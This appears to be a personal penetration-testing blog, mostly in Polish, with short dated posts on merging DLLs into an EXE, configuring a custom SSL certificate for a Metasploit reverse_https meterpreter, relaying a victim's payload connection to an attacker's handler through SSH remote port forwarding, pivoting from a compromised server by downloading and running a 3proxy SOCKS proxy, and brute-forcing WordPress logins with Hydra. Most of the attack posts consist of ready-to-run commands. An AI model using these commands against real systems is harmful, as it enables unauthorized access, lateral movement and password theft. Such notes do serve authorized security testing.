czwartek, 28 lutego 2019

Merge DLL files into EXE

https://www.youtube.com/watch?v=a_r3tQ06xpE

C:\Program Files (x86)\Microsoft\ILMerge>ILMerge.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\SSHapp.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\Renci.SshNet.dll /out:C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\zobaczSam.exe /target:exe /targetplatform:"v4,C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.0"

Download ILMerge: https://www.microsoft.com/en-us/download/confirmation.aspx?id=17630

OR (simply)

Install package from Microsoft Visual Studio

Tools->NuGet Package Manager -> Package manager Console

Install-Package Costura.Fody


środa, 30 stycznia 2019

Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

If you want to use your own certificate for metasploit, for example in case windows/meterpreter/reverse_https we should use auxiliary/gather/impersonate_sslbut but earlier change setting openssl in your OS.

in /etc/ssl/openssl.cnf

from

CipherString=DEFAULT@SECLEVEL=2
to 
CipherString=DEFAULT 


wtorek, 29 stycznia 2019

Przekazywanie portu w Linux np. dla Metasploit

Podczas atakowania zewnętrznego celu często można spotkać następującą infrastrukturę:
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący

W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH

W tym celu na komputerze B dodać:

do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd

Na komputerze A wykonać polecenie:

ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b

Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444


Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888

środa, 23 stycznia 2019

Pivoting


Jeśli potrzebujesz z serwera, na którym zdobyłeś powłokę dostać się do zasobów sieci lokalne to użyj 3proxy

Serwer na którym zdobyłeś powłokę:

wget https://github.com/z3APA3A/3proxy/archive/0.8.12.tar.gz
tar zxvf 0.8.12.tar.gz
cd 3proxy
make -f Makefile.Linux
cp src/3proxy . 
printf "auth none\nsocks -p31337\n" > 3conf
./3proxy 3conf & Teraz masz socks proxy nasłuchujące na porcie 31337 i możesz użyć np proxychains


BONUS:
https://github.com/klsecservices/rpivot  <- reverse proxy

czwartek, 10 stycznia 2019

Hydra cheat sheet

Wordpress:

hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'